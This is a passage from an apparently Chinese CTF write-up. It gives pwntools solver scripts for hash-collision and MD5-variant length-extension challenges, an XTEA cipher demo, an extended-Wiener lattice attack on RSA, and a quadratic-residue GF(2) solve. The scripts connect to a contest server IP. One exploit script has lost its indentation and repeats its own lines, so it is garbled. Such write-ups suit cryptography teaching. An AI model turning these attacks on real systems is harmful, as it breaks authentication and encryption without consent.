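        # decode() raises on input that is not valid UTF-8
        string1 = self.recv().decode()
        string2 = self.recv().decode()
        if TrainHash(string1) == TrainHash(string2):
            self.send(b'\nJust do it!~ You can do more!')
            if string2.encode()[-50:] == string1.encode()[-50:]:
                self.send(flag)
        self.send(b"\nConnection has been closed =.= ")
        self.request.close()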
class ThreadedServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """TCP server that handles each connection in its own thread."""
class ForkedServer(socketserver.ForkingMixIn, socketserver.TCPServer):
    """TCP server that handles each connection in a forked child process."""
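if __name__ == "__main__":
    # 0.0.0.0 listens on every interface; narrow HOST if the service is not
    # meant to be reachable from outside the host.
    HOST, PORT = '0.0.0.0', 10012
    print("HOST:POST " + HOST+":" + str(PORT))
    # TCPServer reads allow_reuse_address while binding inside __init__, so the
    # flag has to be set on the class before the server is created. Setting it
    # on the instance afterwards, as the original did, changes nothing.
    ForkedServer.allow_reuse_address = True
    server = ForkedServer((HOST, PORT), Task)
    server.serve_forever()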
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">from pwn import *
import string
import hashlib
table = string.ascii_letters + string.digits
re = remote('39.106.48.123',29929)
re.recvuntil(b'[+] sha256(XXXX+')
x = re.recv(16)
re.recvuntil(b') == ')
y = re.recv(64)
flag = 0
for a in table:
if flag:break
for b in table:
if flag: break
for c in table:
if flag: break
for d in table:
z = (a + b + c + d).encode()
if hashlib.sha256(z + x).hexdigest() == y.decode():
flag = 1
re.recv()
re.sendline(z)
break
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.interactive()
if hashlib.sha256(z + x).hexdigest() == y.decode():
flag = 1
re.recv()
re.sendline(z)
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.interactive()
</code></pre>
<h2 id="trainplus"><a class="header" href="#trainplus">TrainPlus</a></h2>
<p>exp.py</p>
<pre><code class="language-python">'''
给出了一个16字节随机生成的一个字符串,已知量。并且使用自己的MD00PLUS去对sec进行一次哈希,
发现需要给出一个消息 以及sec+这个消息 能够让我们预测到这块的哈希是多少
首先我们得看一下MD00Plus这个函数,我们发现他其实跟正常的MD5不一样,而改变的地方就是一开始的padding部分
那么其实如果了解哈希长度攻击的很快就能发现只要给出这样的就可以成功。
'''
def Md00Plus(message: bytes):
    """Hash message with an MD5-shaped compression loop and non-standard padding.

    Returns a tuple: the 32-character hex digest and the padded input as a
    list of byte values.

    The digest is the complete chaining state (h0..h3) after the last
    block. A value of the form H(secret + data) can therefore be continued
    by anyone who knows the digest and the padded length, which is what
    md5ex() in this file does. A keyed construction such as HMAC does not
    have this property.
    """
    # Initial chaining values; they differ from the RFC 1321 MD5 initial values
    h0 = 0x114514ab
    h1 = 0x1919810a
    h2 = 0xa0189191
    h3 = 0xba415411
    # Left-rotation amount for each of the 64 steps
    R = (7, 12, 17, 22) * 4 + (5, 9, 14, 20) * 4 + (4, 11, 16, 23) * 4 + (6, 10, 15, 21) * 4
    # Additive constant for each of the 64 steps
    K = (0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee,
         0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501, 0x698098d8,
         0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193,
         0xa679438e, 0x49b40821, 0xf61e2562, 0xc040b340, 0x265e5a51,
         0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
         0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905,
         0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a, 0xfffa3942, 0x8771f681,
         0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60,
         0xbebfbc70, 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05,
         0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665, 0xf4292244,
         0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92,
         0xffeff47d, 0x85845dd1, 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314,
         0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391)
    # The four round functions
    F = lambda x, y, z: ((x &amp; y) | ((~x) &amp; z))
    G = lambda x, y, z: ((x &amp; z) | (y &amp; (~z)))
    H = lambda x, y, z: (x ^ y ^ z)
    I = lambda x, y, z: (y ^ (x | (~z)))
    # 32-bit left rotation
    L = lambda x, n: ((x &lt;&lt; n) | (x &gt;&gt; (32 - n))) &amp; 0xffffffff
    # Four bytes -> one little-endian 32-bit word (first argument is the low byte)
    W = lambda i4, i3, i2, i1: (i1 &lt;&lt; 24) | (i2 &lt;&lt; 16) | (i3 &lt;&lt; 8) | i4
    # Byte-order swap of a 32-bit word
    reverse = lambda x: (x &lt;&lt; 24) &amp; 0xff000000 | (x &lt;&lt; 8) &amp; 0x00ff0000 | \
        (x &gt;&gt; 8) &amp; 0x0000ff00 | (x &gt;&gt; 24) &amp; 0x000000ff
    ascii_list = list(map(lambda x: x, message))
    msg_length = len(ascii_list) * 8
    # Padding: 0x80, then bytes of value 1 (MD5 pads with 0) until 8 bytes remain
    # in the block, then the bit length as 8 little-endian bytes
    ascii_list.append(128)
    while (len(ascii_list) * 8 + 64) % 512 != 0:
        ascii_list.append(1)
    for i in range(8):
        ascii_list.append((msg_length &gt;&gt; (8 * i)) &amp; 0xff)
    # One pass per 64-byte block
    for i in range(len(ascii_list) // 64):
        a, b, c, d = h0, h1, h2, h3
        for j in range(64):
            # f is the round function value, g the index of the message word used
            if 0 &lt;= j &lt;= 15:
                f = F(b, c, d) &amp; 0xffffffff
                g = j
            elif 16 &lt;= j &lt;= 31:
                f = G(b, c, d) &amp; 0xffffffff
                g = ((5 * j) + 1) % 16
            elif 32 &lt;= j &lt;= 47:
                f = H(b, c, d) &amp; 0xffffffff
                g = ((3 * j) + 5) % 16
            else:
                f = I(b, c, d) &amp; 0xffffffff
                g = (7 * j) % 16
            aa, dd, cc = d, c, b
            # Byte offset of word g inside block i
            s = i * 64 + g * 4
            w = W(ascii_list[s], ascii_list[s + 1], ascii_list[s + 2], ascii_list[s + 3])
            bb = (L((a + f + K[j] + w) &amp; 0xffffffff, R[j]) + b) &amp; 0xffffffff
            a, b, c, d = aa, bb, cc, dd
        # Feed-forward: add the block result to the chaining state
        h0 = (h0 + a) &amp; 0xffffffff
        h1 = (h1 + b) &amp; 0xffffffff
        h2 = (h2 + c) &amp; 0xffffffff
        h3 = (h3 + d) &amp; 0xffffffff
    # The state words are byte-swapped and concatenated into the digest
    h0, h1, h2, h3 = reverse(h0), reverse(h1), reverse(h2), reverse(h3)
    digest = (h0 &lt;&lt; 96) | (h1 &lt;&lt; 64) | (h2 &lt;&lt; 32) | h3
    return hex(digest)[2:].rjust(32, '0'),ascii_list
def md5ex(hash,message: bytes):
    """Continue a Md00Plus computation from a published digest.

    hash is a 32-character hex digest; its four words are byte-swapped back
    and used as the starting chaining state instead of the fixed initial
    values. message is then padded and compressed as in Md00Plus, with the
    length field counting 512 extra bits, i.e. exactly one earlier 64-byte
    block is assumed. Returns (hex digest, padded byte list).

    This works because the digest equals the full internal state; it is the
    reason H(secret + data) must not be used as an authenticator.
    """
    reverse = lambda x: (x &lt;&lt; 24) &amp; 0xff000000 | (x &lt;&lt; 8) &amp; 0x00ff0000 | \
        (x &gt;&gt; 8) &amp; 0x0000ff00 | (x &gt;&gt; 24) &amp; 0x000000ff
    # Split the digest into its four 32-bit words, lowest word first, and undo
    # the byte swap that Md00Plus applies before output
    hash = int(hash,16)
    h3 = reverse(hash&amp;0xffffffff)
    hash &gt;&gt;= 32
    h2 = reverse(hash&amp;0xffffffff)
    hash &gt;&gt;= 32
    h1 = reverse(hash&amp;0xffffffff)
    hash &gt;&gt;= 32
    h0 = reverse(hash&amp;0xffffffff)
    # Left-rotation amount for each of the 64 steps
    R = (7, 12, 17, 22) * 4 + (5, 9, 14, 20) * 4 + (4, 11, 16, 23) * 4 + (6, 10, 15, 21) * 4
    # Additive constant for each of the 64 steps
    K = (0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee,
         0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501, 0x698098d8,
         0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193,
         0xa679438e, 0x49b40821, 0xf61e2562, 0xc040b340, 0x265e5a51,
         0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
         0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905,
         0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a, 0xfffa3942, 0x8771f681,
         0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60,
         0xbebfbc70, 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05,
         0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665, 0xf4292244,
         0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92,
         0xffeff47d, 0x85845dd1, 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314,
         0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391)
    # The four round functions
    F = lambda x, y, z: ((x &amp; y) | ((~x) &amp; z))
    G = lambda x, y, z: ((x &amp; z) | (y &amp; (~z)))
    H = lambda x, y, z: (x ^ y ^ z)
    I = lambda x, y, z: (y ^ (x | (~z)))
    # 32-bit left rotation
    L = lambda x, n: ((x &lt;&lt; n) | (x &gt;&gt; (32 - n))) &amp; 0xffffffff
    # Four bytes -> one little-endian 32-bit word (first argument is the low byte)
    W = lambda i4, i3, i2, i1: (i1 &lt;&lt; 24) | (i2 &lt;&lt; 16) | (i3 &lt;&lt; 8) | i4
    ascii_list = list(map(lambda x: x, message))
    # Length field = this message plus one already-processed 512-bit block
    msg_length = len(ascii_list) * 8 + 512
    # Same padding rule as Md00Plus: 0x80, bytes of value 1, 8-byte length
    ascii_list.append(128)
    while (len(ascii_list) * 8 + 64) % 512 != 0:
        ascii_list.append(1)
    for i in range(8):
        ascii_list.append((msg_length &gt;&gt; (8 * i)) &amp; 0xff)
    # One pass per 64-byte block
    for i in range(len(ascii_list) // 64):
        a, b, c, d = h0, h1, h2, h3
        for j in range(64):
            # f is the round function value, g the index of the message word used
            if 0 &lt;= j &lt;= 15:
                f = F(b, c, d) &amp; 0xffffffff
                g = j
            elif 16 &lt;= j &lt;= 31:
                f = G(b, c, d) &amp; 0xffffffff
                g = ((5 * j) + 1) % 16
            elif 32 &lt;= j &lt;= 47:
                f = H(b, c, d) &amp; 0xffffffff
                g = ((3 * j) + 5) % 16
            else:
                f = I(b, c, d) &amp; 0xffffffff
                g = (7 * j) % 16
            aa, dd, cc = d, c, b
            # Byte offset of word g inside block i
            s = i * 64 + g * 4
            w = W(ascii_list[s], ascii_list[s + 1], ascii_list[s + 2], ascii_list[s + 3])
            bb = (L((a + f + K[j] + w) &amp; 0xffffffff, R[j]) + b) &amp; 0xffffffff
            a, b, c, d = aa, bb, cc, dd
        # Feed-forward: add the block result to the chaining state
        h0 = (h0 + a) &amp; 0xffffffff
        h1 = (h1 + b) &amp; 0xffffffff
        h2 = (h2 + c) &amp; 0xffffffff
        h3 = (h3 + d) &amp; 0xffffffff
    # The state words are byte-swapped and concatenated into the digest
    h0, h1, h2, h3 = reverse(h0), reverse(h1), reverse(h2), reverse(h3)
    digest = (h0 &lt;&lt; 96) | (h1 &lt;&lt; 64) | (h2 &lt;&lt; 32) | h3
    return hex(digest)[2:].rjust(32, '0'),ascii_list
from pwn import*
import string
from pwnlib.util.iters import mbruteforce
from hashlib import*
table = string.ascii_letters+string.digits
io = remote("39.106.48.123",39628)
def pow1():
    """Answer the service's proof-of-work prompt and return the digest it announced.

    Reads the 16 known trailing characters and the target SHA-256 hex digest
    from `io`, searches the four missing leading characters over `table`,
    and sends them back.
    """
    io.recvuntil(b'XXXX+')
    known_tail = io.recv(16).decode("utf8")
    io.recvuntil(b'== ')
    target_digest = io.recvline().strip().decode("utf8")

    def matches(prefix):
        return sha256((prefix + known_tail).encode()).hexdigest() == target_digest

    answer = mbruteforce(matches, table, length=4, method='fixed')
    io.sendlineafter(b'XXXX :', answer.encode())
    return target_digest
pow1()
io.recvuntil(b'Thing:')
GreatThing = io.recv(16)
from Crypto.Util.number import*
io.recvuntil(b'REATTHING:')
Md00 = io.recv(32)
H = md5ex(Md00.decode(),GreatThing)[0].encode()
for i in range(1,26):
Pad = Md00Plus(i*b'a')[1][i:]
MSG = bytes(Pad) + GreatThing
s = hex(bytes_to_long(MSG))[2:].encode()+b','+ hex(bytes_to_long(H))[2:].encode()
io.sendline(s)
print(i,io.recv())
msg = io.recv()
if b'flag' in msg:
print(msg)
break
io.interactive()
</code></pre>
<h2 id="tea_签到题"><a class="header" href="#tea_签到题">tea_签到题</a></h2>
<pre><code class="language-js">/******************************************
Use: "Hello World!".encrypt("key")
=&gt; "íSjÝqTÂWÕã”Aa[UÄ"
******************************************/
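String.prototype.encrypt = function(password) {
  // Encrypts this string in 8-character blocks with code() and returns the
  // result with control characters escaped.
  // Limits visible in this code: each block is encrypted independently
  // (electronic codebook), the key is the first 16 characters of the
  // password used as-is, and no integrity check is added.
  const v = new Array(2);
  const k = new Array(4);
  let s = "";
  // Declared locally. The original assigned to an undeclared `plaintext`,
  // which creates a global in sloppy mode and throws in strict mode.
  const plaintext = escape(this); // use escape() so only have single-byte chars to encode
  // build key directly from 1st 16 chars of password
  for (let i = 0; i &lt; 4; i++) k[i] = Str4ToLong(password.slice(i * 4, (i + 1) * 4));
  for (let i = 0; i &lt; plaintext.length; i += 8) { // encode plaintext into s in 64-bit (8 char) blocks
    v[0] = Str4ToLong(plaintext.slice(i, i + 4)); // ... note this is 'electronic codebook' mode
    v[1] = Str4ToLong(plaintext.slice(i + 4, i + 8));
    code(v, k);
    s += LongToStr4(v[0]) + LongToStr4(v[1]);
  }
  // note: if plaintext or password are passed as string objects, rather than strings, this
  // function will throw an 'Object doesn't support this property or method' error
  return escCtrlCh(s);
}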
// Like C code
function code(v, k) {
  // Extended TEA: this is the 1997 revised version of Needham &amp; Wheeler's algorithm
  // params: v[2] 64-bit value block; k[4] 128-bit key
  // Encrypts the block in place: v[0] and v[1] are overwritten.
  let y = v[0];
  let z = v[1];
  const delta = 0x9E3779B9;
  // sum advances by delta once per iteration, so the loop runs 32 times
  const limit = delta * 32;
  let sum = 0;
  while (sum != limit) {
    // Operator precedence matters here: + binds tighter than ^, so each line is
    // ((shifted mix) + other half) ^ (sum + key word)
    y += (z &lt;&lt; 4 ^ z &gt;&gt;&gt; 5) + z ^ sum + k[sum &amp; 3];
    sum += delta;
    z += (y &lt;&lt; 4 ^ y &gt;&gt;&gt; 5) + y ^ sum + k[sum &gt;&gt;&gt; 11 &amp; 3];
    // note: unsigned right-shift '&gt;&gt;&gt;' is used in place of original '&gt;&gt;', due to lack
    // of 'unsigned' type declaration in JavaScript (thanks to Karsten Kraus for this)
  }
  v[0] = y;
  v[1] = z;
}
// supporting functions
function Str4ToLong(s) {
  // Pack up to four characters of s into one number, first character in the low byte.
  let packed = 0;
  let pos = 0;
  while (pos &lt; 4) {
    // charCodeAt() gives NaN past the end of s; the shift turns that into 0
    packed |= s.charCodeAt(pos) &lt;&lt; (pos * 8);
    pos += 1;
  }
  if (isNaN(packed)) {
    return 0;
  }
  return packed;
}
function LongToStr4(v) {
  // Split v into four bytes, lowest first, and return them as a 4-character string.
  const codes = [0, 8, 16, 24].map(function (shift) {
    return v &gt;&gt; shift &amp; 0xFF;
  });
  return String.fromCharCode(...codes);
}
function escCtrlCh(str) {
  // Replace control characters, quotes and '!' with !code!, where code is the
  // decimal character code, so the encrypted text survives as a plain string.
  return str.replace(/[\0\t\n\v\f\r\xa0'"!]/g, function (ch) {
    return '!' + ch.charCodeAt(0) + '!';
  });
}
function unescCtrlCh(str) {
  // Turn every !code! sequence (one to three digits) back into its character.
  return str.replace(/!\d\d?\d?!/g, function (token) {
    return String.fromCharCode(token.slice(1, -1));
  });
}
// module.exports = (text, password) =&gt; text.encrypt(password);
/******************************************
Use: "íSjÝqTÂWÕã”Aa[UÄ".decrypt("key")
=&gt; "Hello World!"
******************************************/
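String.prototype.decrypt = function(password) {
  // Reverses encrypt(): unescapes the control characters, decrypts each
  // 8-character block with decode() and unescapes the recovered text.
  // A wrong password is not detected; it only produces different output.
  const v = new Array(2);
  const k = new Array(4);
  let s = "";
  // Key: the first 16 characters of the password, used as-is
  for (let i = 0; i &lt; 4; i++) k[i] = Str4ToLong(password.slice(i * 4, (i + 1) * 4));
  // Declared locally. The original assigned to an undeclared `ciphertext`,
  // which creates a global in sloppy mode and throws in strict mode.
  const ciphertext = unescCtrlCh(this);
  for (let i = 0; i &lt; ciphertext.length; i += 8) { // decode ciphertext into s in 64-bit (8 char) blocks
    v[0] = Str4ToLong(ciphertext.slice(i, i + 4));
    v[1] = Str4ToLong(ciphertext.slice(i + 4, i + 8));
    decode(v, k);
    s += LongToStr4(v[0]) + LongToStr4(v[1]);
  }
  // strip trailing null chars resulting from filling 4-char blocks:
  s = s.replace(/\0+$/, '');
  return unescape(s);
};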
// Like C code
function decode(v, k) {
  // Inverse of code(): decrypts the block in place, overwriting v[0] and v[1].
  // params: v[2] value block; k[4] key words
  let y = v[0];
  let z = v[1];
  const delta = 0x9E3779B9;
  // Start from the final sum of code() and step back by delta until 0
  let sum = delta * 32;
  while (sum != 0) {
    // Same expressions as in code(), applied in reverse order with subtraction
    z -= (y &lt;&lt; 4 ^ y &gt;&gt;&gt; 5) + y ^ sum + k[sum &gt;&gt;&gt; 11 &amp; 3];
    sum -= delta;
    y -= (z &lt;&lt; 4 ^ z &gt;&gt;&gt; 5) + z ^ sum + k[sum &amp; 3];
  }
  v[0] = y;
  v[1] = z;
}
// supporting functions
function Str4ToLong(s) { // convert 4 chars of s to a numeric long
let v = 0;
for (let i = 0; i &lt; 4; i++) v |= s.charCodeAt(i) &lt;&lt; i * 8;
return isNaN(v) ? 0 : v;
}
function LongToStr4(v) { // convert a numeric long to 4 char string
const s = String.fromCharCode(v &amp; 0xFF, v &gt;&gt; 8 &amp; 0xFF, v &gt;&gt; 16 &amp; 0xFF, v &gt;&gt; 24 &amp; 0xFF);
return s;
}
function escCtrlCh(str) { // escape control chars which might cause problems with encrypted texts
return str.replace(/[\0\t\n\v\f\r\xa0'"!]/g, c =&gt; `!${c.charCodeAt(0)}!`);
}
function unescCtrlCh(str) { // unescape potentially problematic nulls and control characters
return str.replace(/!\d\d?\d?!/g, c =&gt; String.fromCharCode(c.slice(1, -1)));
}
// module.exports = (text, password) =&gt; text.decrypt(password);
let text = "flag{demo}"
let entext = text.encrypt("123321")
let detext = entext.decrypt("123321")
console.log(detext);
</code></pre>
<h2 id="simple"><a class="header" href="#simple">simple</a></h2>
<pre><code class="language-python">#**Task
# task.py
from Crypto.Util.number import *
import gmpy2
import random
def get_extend():
    """Return a public exponent whose private exponent is a prime of at most 731 bits.

    The prime d is drawn from [2**680, 2**730] and inverted modulo the
    module-level `lcm`. The task builds the modulus from two 1024-bit
    primes, so d is far shorter than the modulus, and it publishes two
    exponents made this way for the same modulus. Private exponents must be
    full size to avoid small-exponent lattice attacks.
    """
    candidate = random.randint(2**680, 2**730)
    while not isPrime(candidate):
        candidate = random.randint(2**680, 2**730)
    return gmpy2.invert(candidate, lcm)
#731
flag = b"flag{xxxxxxxxxxx}"
m = bytes_to_long(flag)
e = 65537
p = getPrime(1024)
q = getPrime(1024)
lcm = gmpy2.lcm(p-1,q-1)
n = p*q
c = pow(m,e,n)
e1 = get_extend()
e2 = get_extend()
print("e1 =",e1)
print("e2 =",e2)
print("c =",c)
print("n =",n)
#e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
#e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
#c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
#n = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607
#***Solution
# exp.sage
from sage.all import *
from Crypto.Util.number import *
from Crypto.Cipher import DES
import gmpy2
from Crypto.Util.number import *
from gmpy2 import invert
# USE extending wiener attack
e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
N = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607
# Size bound used to scale the lattice: the private exponents are taken to be below N**a
a = 0.356 # 731./2049
M1 = N ** 0.5
M2 = N ** (a + 1)
# Column weights that balance the size of the target vector's entries
D = diagonal_matrix(ZZ, [N, M1, M2, 1])
# Lattice built from N and the two public exponents that share it
M = matrix(ZZ, [[1, -N, 0, N ** 2], [0, e1, -e1, -e1 * N], [0, 0, e2, -e2 * N], [0, 0, 0, e1 * e2]]) * D
L = M.LLL()
# Shortest reduced vector, then its integer coefficients with respect to M
t = vector(ZZ, L[0])
x = t * M ** (-1)
# The ratio of the first two coefficients, times e1, is used as the group order.
# NOTE(review): the task inverted d modulo lcm(p-1, q-1), so this presumably
# approximates that value rather than (p-1)*(q-1) — confirm.
phi = int(x[1] / x[0] * e1)
# Private exponent for the e = 65537 that encrypted the flag
d = invert(0x10001, phi)
m = pow(c, d, N)
print(long_to_bytes(m))
'''
pip install pycryptodome
pip install gmpy2
sage --pip install gmpy2
sage exp.sage
'''
# b'flag{d30488dc-ed10-4f09-aebb-5c049436d250}'
</code></pre>
<h2 id="-1"><a class="header" href="#-1"></a></h2>
<pre><code class="language-python">#***Task.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import random
from Crypto.Util.number import bytes_to_long
# from secret import FLAG
FLAG = b"flag{123}"
assert FLAG.startswith(b'flag{') and FLAG.endswith(b'}')
q = 210767327475911131359308665806489575328083
# Flag body (without the flag{...} wrapper) as a bit string
flag_bin = bin(bytes_to_long(FLAG[5:-1]))[2:]
l = len(flag_bin) #len("1100010011001000110011")
# These two prints show the bit length and the secret bits themselves
print(l)
print(bin(bytes_to_long(FLAG[5:-1]))) #0b1100010011001000110011
# Number of samples: between l and 2*l
n = random.randint(l, 2*l) #randint(22, 22*2)
print(n) #24
cipher = []
for _ in range(n): #range(0,24,1)
    # l random values modulo q, all published
    r = [random.randint(2, q-2) for _ in range(l)]#range(22) randint(2, 210767327475911131359308665806489575328081)
    # print(r)
    # s = product of the r[i] whose flag bit is 1, modulo q.
    # Quadratic residuosity is multiplicative, so whether s is a residue depends
    # only on the selected r[i]; each sample therefore gives away one linear
    # equation over GF(2) in the flag bits.
    s = 1
    for i in range(l):#range(22)
        s = s * r[i] ** int(flag_bin[i]) % q
    cipher.append([r, s])
with open('new_output.txt', 'w') as f:
    f.write(str(cipher))
</code></pre>
<pre><code class="language-python">#exp.py
from Crypto.Util.number import *
from sage.all import *
def add(a,p):
    """Return 1 when a**((p-1)//2) mod p equals 1, otherwise 0.

    For an odd prime p this is Euler's criterion: 1 marks a quadratic residue.
    """
    return 1 if pow(a, (p - 1) // 2, p) == 1 else 0
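q = 210767327475911131359308665806489575328083
# NOTE(review): eval() runs whatever expression the file contains. The file is
# expected to hold only a literal list of integers, which ast.literal_eval()
# parses without executing code; prefer it when the file's origin is not trusted.
# NOTE(review): the task script writes 'new_output.txt' while this reads
# 'output.txt' — presumably the published file name; confirm.
with open('output.txt','rb') as f:  # closes the handle the original left open
    out=eval(f.read())
# One row per sample, one column per flag bit, everything over GF(2)
A=Matrix(GF(2),len(out))
v=vector(GF(2),len(out))
for i in range(len(out)):
    t1,t2=out[i]
    for j in range(len(t1)):
        A[i,j]=add(t1[j],q)
    # add() gives 1 for a residue; the +1 flips it so that 1 marks a non-residue
    v[i]=add(t2,q)+1
# Solve A * m = v for the flag bits
m=A.solve_right(v)
m=''.join(map(str,m))
print(long_to_bytes(int(m,2)))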
</code></pre>
<h2 id="nono"><a class="header" href="#nono">NONO</a></h2>
<pre><code class="language-python">import base64
import re
# 填出来的数织答案
v27 ="0000000000000000000000000000000010000000000000000001110000000000000000111110000000000000111111110000000000011111111100000000001111111111100000000000111111100000000000000000000000000111111111111110000011100000000011110000111000000000111111100111111111111111000000000000000000000000000000111111100000000000001111111000000000000111111110000000000001111111000000000000000000000000000000000000000000000000"
# 得到flagflag{UDnkDgD2HEPlFEXlF8uyHPBHFEEnD8NTDPr3j85THDP+jKD=}
##
# 按照0或1的连续⻓度进⾏压缩
tmpl = re.findall(r'0+|1+', v27)
v24 = bytes([len(x) for x in tmpl])
# 拿到base64的新表
unk_403040 = [0x0C, 0xFF, 0xFF, 0xFF, 0x22, 0x2C, 0x25, 0x05, 0x1E, 0x1F, 0x34, 0x1D,
0x39, 0x30, 0x15, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2B, 0x14, 0x2D, 0x00,
0x10, 0x02, 0x11, 0x03, 0x37, 0x29, 0x33, 0x3B, 0x2E, 0x24, 0x2F, 0x20, 0x0A, 0x3D,
0x3F, 0x07, 0x08, 0x17, 0x0D, 0x28, 0x27, 0x26, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0x35, 0x2A, 0x3A, 0x13, 0x18, 0x3E, 0x31, 0x38, 0x21, 0x01, 0x12, 0x0B, 0x32, 0x04,
0x06, 0x19, 0x09, 0x3C, 0x1B, 0x0E, 0x1C, 0x36, 0x0F, 0x16, 0x1A, 0x23]
# Rebuild the custom alphabet. unk_403040 is a decoding table: the entry at
# position i belongs to the character chr(i + 43) and holds that character's
# 6-bit value, with 0xFF marking characters outside the alphabet.
mytable = [0 for _ in range(64)]
for x in unk_403040:
    if x != 0xFF:
        mytable[x] = chr(unk_403040.index(x)+43)
mytable = ''.join(mytable)
# Encode with the standard alphabet, then translate to the custom one
# ('=' padding is not part of b64table and stays unchanged)
b64table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
s = base64.b64encode(v24)
flag = "flag{" + s.decode().translate(str.maketrans(b64table, mytable)) + "}"
print(flag)
</code></pre>
<h2 id="kaokaoni"><a class="header" href="#kaokaoni">kaokaoni</a></h2>
<pre><code class="language-python">a = [[8, 2, 22, 97, 38, 15, 0, 40, 0, 75, 4, 5, 7, 78, 52, 12, 50, 77, 91, 8],
[49, 49, 99, 40, 17, 81, 18, 57, 60, 87, 17, 40, 98, 43, 69, 48, 4, 56, 62, 0],
